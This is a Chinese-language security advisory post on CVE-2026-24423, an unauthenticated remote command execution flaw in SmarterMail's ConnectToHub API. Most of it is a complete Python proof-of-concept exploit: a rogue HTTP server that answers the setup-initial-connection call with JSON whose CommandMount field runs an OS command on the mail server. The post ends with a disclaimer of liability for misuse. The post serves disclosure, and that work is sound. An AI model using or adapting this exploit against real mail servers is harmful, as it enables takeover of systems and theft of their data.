
0x00 前言
SmarterMail是一款由SmarterTools公司开发的基于Windows平台的邮件服务器软件,专为中小型企业、教育机构及需要私有化部署的组织设计,提供完整的邮件通信解决方案。其核心定位是作为Microsoft Exchange的轻量级替代方案,无需依赖Active Directory,部署更灵活,运维成本更低。
0x01 漏洞描述
漏洞源于ConnectToHub API接口未对访问者进行身份验证。攻击者可通过构造特定请求,诱导SmarterMail服务器指向恶意HTTP服务器,进而向 SmarterMail返回恶意操作系统命令。
攻击者可以远程执行任意命令,完全控制受影响的系统,导致数据泄露、服务中断等严重后果。
0x02 CVE编号
CVE-2026-24423
0x03 影响版本
SmarterMail < Build 9511
0x04 漏洞详情
POC:
https://github.com/aavamin/CVE-2026-24423
#!/usr/bin/env python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
class Handler(BaseHTTPRequestHandler):
def _send_json(self, code: int, obj: dict):
data = json.dumps(obj).encode("utf-8")
self.send_response(code)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(data)))
self.end_headers()
self.wfile.write(data)
def do_POST(self):
if self.path != "/web/api/node-management/setup-initial-connection":
self._send_json(404, {"error": "not found", "path": self.path})
return
length = int(self.headers.get("Content-Length", "0"))
body = self.rfile.read(length).decode("utf-8", errors="replace")
print("[*] Received POST:", self.path)
print("[*] Body:", body)
resp = {
"ClusterID": "f0e12780-f462-4b51-a7db-149f1d56209c",
"SharedSecret": "any-value",
"TargetHubs": {"a": "b"},
"IsStandby": False,
"SystemMount": {
"Enabled": True,
"ReadOnly": False,
"MountPath": "C:\\\\",
"CommandMount": "whoami > C:\\\\whoami.txt"
},
"SystemAdminUsernames": ["admin"]
}
self._send_json(200, resp)
def main():
host = "0.0.0.0"
port = 80
print(f"Serving on http://{host}:{port}")
HTTPServer((host, port), Handler).serve_forever()
if __name__ == "__main__":
main()
#Powered by ChatGPT0x05 参考链接
https://github.com/aavamin/CVE-2026-24423
https://www.smartertools.com/smartermail/release-notes/current
本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。